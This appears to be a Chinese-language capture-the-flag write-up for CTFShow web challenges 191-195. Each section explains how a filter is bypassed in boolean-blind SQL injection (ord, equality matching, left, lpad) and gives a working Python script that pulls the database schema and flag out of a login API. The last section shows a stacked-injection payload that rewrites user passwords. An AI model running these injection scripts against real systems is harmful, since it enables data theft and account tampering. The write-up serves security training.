CTFShow-web-vip/SQL 191-195

CTFShow-web-vip/SQL 191-195

web 191 Bool(ord替换ascii)

这道题是典型的Bool注入,只不过它过滤了char,但是我们可以使用ord,所以本质上和上一关无区别
在 MySQL 中,ASCIIORD 都是用来获取字符的 ASCII 码值的函数,它们在大多数情况下是等价的。具体来说:

  • **ASCII(str)**:

    • 返回字符串 str 中第一个字符的 ASCII 码值。
    • 如果 str 是空字符串,则返回 0。
    • 如果 str 包含多字符,则只返回第一个字符的编码值。

  • **ORD(str)**:

    • 也是返回字符串 str 中第一个字符的 ASCII 码值。
    • 功能与 ASCII 完全相同,实际实现也是 ASCII 函数。

总结:在 MySQL 中,ASCIIORD 是等价的函数,都用于获取字符串中第一个字符的 ASCII 码值。两者可以互换使用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import sys
import time

url = "http://73940d5f-0270-4788-a6ec-d446c8fbaec6.challenge.ctf.show/api/"
flag = ""

for i in range(0,60):
    max = 127
    min = 32

    while 1:
        mid = (max + min)>>1#除以 2 并向下取整
        if (min == mid):
                flag+=chr(mid)
                print(flag)
                break
        #payload = "admin'and (ord(substr((select database()),{},1))<{})#".format(i,mid)
        #payload = "admin'and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)
        #ctfshow_fl0g
        #payload = "admin'and (ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid)
        #id,f1ag
        payload = "admin'and (ord(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)
        data = {
             "username":payload,
             "password":0
        }

        res = requests.post(url=url,data=data)
        time.sleep(0.3)
        if res.text.find("8bef")>0:
            max = mid
        else:
            min = mid

web 192 (Bool基础)

这关过滤了ord,但是可以使用最基础的匹配方式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
import sys
import time

url = "http://d5629bd3-6a7d-4742-91a2-2f440dcc5e36.challenge.ctf.show/api/"
char = "}{abcdefghijklmnopqr-stuvwxyz0123456789_"
flag = ""

for i in range(0,60):
    for s in char:
        payload = "admin'and ((substr((select f1ag from ctfshow_fl0g),{},1)='{}'))#".format(i,s)

        data = {
            "username":payload,
            "password":0,
        }

        res = requests.post(url = url,data =data)
        time.sleep(0.3)
        if res.text.find("8bef")>0:
            flag += s
            print(flag)
            break

web 193 Bool-left

这关过滤了substr,使用left从左依次截取也可以

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import time

url = "http://e73f78ab-a3a0-4cbc-b3c0-d08880061a99.challenge.ctf.show/api/"
flagstr = ",_}{abcdefghijklmnopqr-stuvwxyz0123456789"
enameChar = ""
flag = ""
for i in range(1,60):
    for mid in flagstr:
        #payload = "admin'and ((left((select database()),{})='{}'))#".format(i,enameChar+mid)
        #ctfshow_web
        #payload = "admin'and ((left((select group_concat(table_name) from information_schema.tables where table_schema=database()),{})='{}'))#".format(i,enameChar+mid)
        #ctfshow_flxg
        #payload = "admin'and ((left((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{})='{}'))#".format(i,enameChar+mid)
        #id,f1ag
        payload = "admin'and ((left((select f1ag from ctfshow_flxg),{})='{}'))#".format(i,enameChar+mid)

        data = {
            "username":payload,
            "password":0,
        }
        res = requests.post(url = url,data =data)
        time.sleep(0.3)
        if res.text.find("8bef")>0:
            enameChar += mid
            flag += mid
            print(flag)
            break

web 194 Bool-lpad

这关禁用了不少,substr等,但是这关有两个可以用

  1. lpad 有两个功能,填充与截取,它取决于第三个参数
    • 当猜测的长度大于实际长度
      当我们在查找数据库时候,如果判断的长度大于实际的长度,如果此时第三个 参数不空,则会将第三个参数进行左填充,当然第三个参数如果为空的话,则此时查询结果也是空
    • 当猜测的长度小于实际长度
      第三个参数空与不空都不会进行填充,也不会影响查询结果,但是为了不影响注入,默认我们都将第三个参数置空

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
import time

url = "http://0328ab31-3379-44e8-8081-7fe2b7d5107a.challenge.ctf.show/api/"
flagstr = ",_}{abcdefghijklmnopqr-stuvwxyz0123456789"

enameChar = ""
flag = ""
for i in range(1,60):
    for mid in flagstr:
        payload = "admin'and ((lpad((select database()),{},'')='{}'))#".format(i,enameChar+mid)
        #ctfshow_web
        #payload = "admin'and ((lpad((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},'')='{}'))#".format(i,enameChar+mid)
        #ctfshow_flxg
        #payload = "admin'and ((lpad((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{},'')='{}'))#".format(i,enameChar+mid)
        #id,f1ag
        #payload = "admin'and ((lpad((select f1ag from ctfshow_flxg),{},'')='{}'))#".format(i,enameChar+mid)

        data = {
            "username":payload,
            "password":0,
        }
        res = requests.post(url = url,data =data)
        time.sleep(0.3)
        if res.text.find("8bef")>0:
            enameChar += mid
            flag += mid
            print(flag)
            break

web 195 堆叠注入

为什么是堆叠注入,前面几关实际上都有 ‘ ‘ 或者 “ “占位,能显著限制堆叠注入,但是这个没有,所以就没法了

1
2
3
4
username = 0;update`ctfshow_user`set`pass`=1
password = 1 
注入的SQL语句变成
select pass from ctfshow_user where username = 1;update `ctfshow_user` `set` `pass`= 1